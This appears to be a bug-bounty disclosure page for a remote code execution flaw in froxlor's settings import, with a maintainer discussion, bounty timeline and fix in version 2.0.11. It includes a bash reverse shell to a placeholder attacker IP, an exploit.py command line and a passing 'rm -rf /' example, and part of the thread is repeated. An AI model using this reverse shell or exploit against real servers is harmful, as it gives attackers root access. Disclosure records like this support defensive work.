Remote Code Execution in "Import Settings" feature in froxlor/froxlor

Valid

Reported on

Feb 4th 2023

Description

Due to Improper data validation in "Import Settings" feature, an authenticated attacker can send crafted settings with malicious payload inside "system.croncmdline" value.

Step to reproduce

Requirement: PHP code must be executed on attacker machine

Step 1: Attacker run web server and deliver foo.txt file. The contain of this file is a reverse shell to attacker machine, for example:

#!/bin/bash
bash -i >& /dev/tcp/{ATTACKER-IP}/{ATTACKER-PORT} 0>&1

Step 2: Run file exploit.py and required by this exploit

python3 exploit.py -t {VICTIM-WEBSERVER} -u {USERNAME} -p {PASSWORD} -s {ATTACKER-WEBSERVER} -lport {ATTACKER-LISTENING-PORT}

Proof of Concept

Impact

This vulnerability can be exploited to cause a Remote Code Execution on target web server with highest privilege user (root)

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago

We have contacted a member of the froxlor team and are waiting to hear back 2 months ago

Michael Kaufmann Michael

commented 2 months ago

Maintainer

Setting reload commands for the Cronjob is part of froxlor. You could also just specify a script that runs rm -rf / if you want. Also the required permissions for these actions is high

Michael Kaufmann modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago

A froxlor/froxlor maintainer

commented 2 months ago

Hi Michael, Thank you for your feedback. However, in this Line of code, the croncmdline parameter was validated by using regex (it only accepted /^[a-z0-9/._- ]+$/i). But by using the import settings feature, not validation or filter at all, so I think it was a critical bug if any admin was compromised and then the attacker can totally compromised the system (because the cron job was run as root privilege)

A froxlor/froxlor maintainer has acknowledged this report 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Michael Kaufmann validated this vulnerability 2 months ago

blakduk has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Michael Kaufmann marked this as fixed in 2.0.11 with commit aa48ff 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Feb 17th 2023

Michael Kaufmann published this vulnerability a month ago

to join this conversation

We are processing your report and will contact the froxlor team within 24 hours. 2 months ago

We have contacted a member of the froxlor team and are waiting to hear back 2 months ago

Michael Kaufmann Michael

commented 2 months ago

Maintainer

Setting reload commands for the Cronjob is part of froxlor. You could also just specify a script that runs rm -rf / if you want. Also the required permissions for these actions is high

Michael Kaufmann modified the Severity from Critical (9.9) to Critical (9.1) 2 months ago

A froxlor/froxlor maintainer

commented 2 months ago

A froxlor/froxlor maintainer has acknowledged this report 2 months ago

The researcher has received a minor penalty to their credibility for miscalculating the severity: -1

Michael Kaufmann validated this vulnerability 2 months ago

blakduk has been awarded the disclosure bounty

The fix bounty is now up for grabs

The researcher's credibility has increased: +7

Michael Kaufmann marked this as fixed in 2.0.11 with commit aa48ff 2 months ago

The fix bounty has been dropped

This vulnerability has been assigned a CVE

This vulnerability is scheduled to go public on Feb 17th 2023

Michael Kaufmann published this vulnerability a month ago

to join this conversation